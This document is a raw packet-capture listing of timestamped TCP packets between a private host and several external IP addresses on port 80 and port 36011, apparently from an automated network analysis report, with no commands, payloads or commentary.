Oct 13, 2023 15:20:57.581818104 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581830978 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581878901 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581906080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581963062 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582020998 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.582021952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582057953 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582092047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.582139969 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582184076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.582211018 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582216024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.582232952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582257032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582302094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.582339048 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582355022 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.582396030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582413912 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.582458019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582528114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.582566977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582611084 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.582689047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.582715034 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582731009 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582770109 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.582811117 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582837105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.582885027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582911015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.582962990 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.582967043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583002090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583028078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583066940 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583096981 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583137035 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583180904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583221912 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583250046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583288908 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583312035 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583329916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583350897 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583421946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583445072 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583462954 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583478928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583508968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583519936 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583548069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583579063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583616972 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583635092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583677053 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583709002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583739996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.583746910 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583781958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.583812952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.584659100 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.596328974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.597054958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.936359882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.978091955 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:58.040340900 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:58.040376902 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:58.392167091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:58.409810066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:58.455271959 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:58.455271959 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:58.807204008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:58.825562000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:58.858865023 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:20:58.868732929 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:59.931293964 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:00.115339994 CEST	80	49715	91.215.85.209	192.168.2.5
Oct 13, 2023 15:21:00.115416050 CEST	49715	80	192.168.2.5	91.215.85.209
Oct 13, 2023 15:21:00.115473986 CEST	49715	80	192.168.2.5	91.215.85.209
Oct 13, 2023 15:21:00.302613020 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:00.302773952 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:00.302894115 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:00.673280001 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:00.673352957 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:00.673372984 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:00.673397064 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:00.673469067 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:00.673501015 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:00.673521996 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:00.673523903 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:00.673593044 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:00.673717976 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:00.673747063 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:00.673831940 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:00.673875093 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:00.673882008 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:00.673922062 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:00.673960924 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:00.915693045 CEST	49715	80	192.168.2.5	91.215.85.209
Oct 13, 2023 15:21:01.043736935 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.050739050 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.050904036 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.063361883 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.076185942 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.076313019 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.088850021 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.101958990 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.102035046 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.115581036 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.127810001 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.127995014 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.141318083 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.153822899 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.154046059 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.166693926 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.179656982 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.179790020 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.193012953 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.205785990 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.205859900 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.219432116 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.233198881 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.233284950 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.245043039 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.257356882 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.257417917 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.260494947 CEST	80	49715	91.215.85.209	192.168.2.5
Oct 13, 2023 15:21:01.270746946 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.283607006 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.283776999 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.421593904 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.427848101 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.428026915 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.440664053 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.459170103 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.459325075 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.469727993 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.490320921 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.490387917 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.492548943 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.505393982 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.505502939 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.518409014 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.531399965 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.531622887 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.546621084 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.557364941 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.557434082 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.570559978 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.583074093 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.583244085 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.596541882 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.609097958 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.609167099 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.621913910 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.633853912 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.633995056 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.645968914 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.656677961 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.656824112 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.667098999 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.683896065 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.684068918 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.699304104 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.699898958 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.700103045 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.711787939 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.721337080 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.721502066 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.732148886 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.746126890 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.746206999 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.753946066 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.764020920 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.764182091 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.774657011 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.785474062 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.785628080 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.797005892 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.806745052 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.806786060 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.806946993 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.819993973 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.820049047 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.820146084 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.833086014 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.833223104 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.833285093 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.846420050 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.846486092 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.846561909 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.860248089 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.860316992 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.860414028 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.870933056 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:01.872710943 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.872750044 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.872900963 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.885853052 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.885931015 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.885989904 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.908240080 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.908379078 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.908435106 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.914737940 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.914935112 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.914937973 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.928030968 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.928149939 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.928230047 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.941916943 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.942022085 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.942061901 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.954216003 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.954314947 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.954412937 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.967772007 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.967936993 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.967948914 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.980905056 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.981061935 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.981066942 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.993921995 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:01.993990898 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:01.994049072 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.007447958 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.007524967 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.007582903 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.020210981 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.020421028 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.020632029 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.033531904 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.033664942 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.033732891 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.046550989 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.046622038 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.046706915 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.059803963 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.059910059 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.060009956 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.072828054 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.072849035 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.072979927 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.085562944 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.085690975 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.085740089 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.101274967 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.101469040 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.101479053 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.109075069 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.109235048 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.109262943 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.121115923 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.121160030 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.121295929 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.132721901 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.132816076 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.132895947 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.145663977 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.145731926 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.145838976 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.155339003 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.155566931 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.155651093 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.169501066 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.169545889 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.169574976 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.177540064 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.177683115 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.177700996 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.189997911 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.190063953 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.190146923 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.190187931 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:02.190278053 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:02.194366932 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.194456100 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.194502115 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.202501059 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.202630997 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:02.202677011 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.202688932 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.210257053 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.210321903 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.210377932 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.218033075 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.218086004 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.218157053 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.225723982 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.225922108 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.225917101 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.233282089 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.233356953 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.233433008 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.240763903 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.240801096 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.240832090 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.248517990 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.248708010 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.248742104 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.256069899 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.256107092 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.256216049 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.262474060 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.262614965 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.262664080 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.269376040 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.269450903 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.269552946 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.276468992 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.276642084 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.276753902 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.283796072 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.283974886 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.283984900 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.290385962 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.290424109 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.290503979 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.300272942 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.300365925 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.300440073 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.304058075 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.304136992 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.304265022 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.310472965 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.310570955 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.310616016 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.316766977 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.316843033 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.316905975 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.323657036 CEST	80	49724	79.137.192.18	192.168.2.5
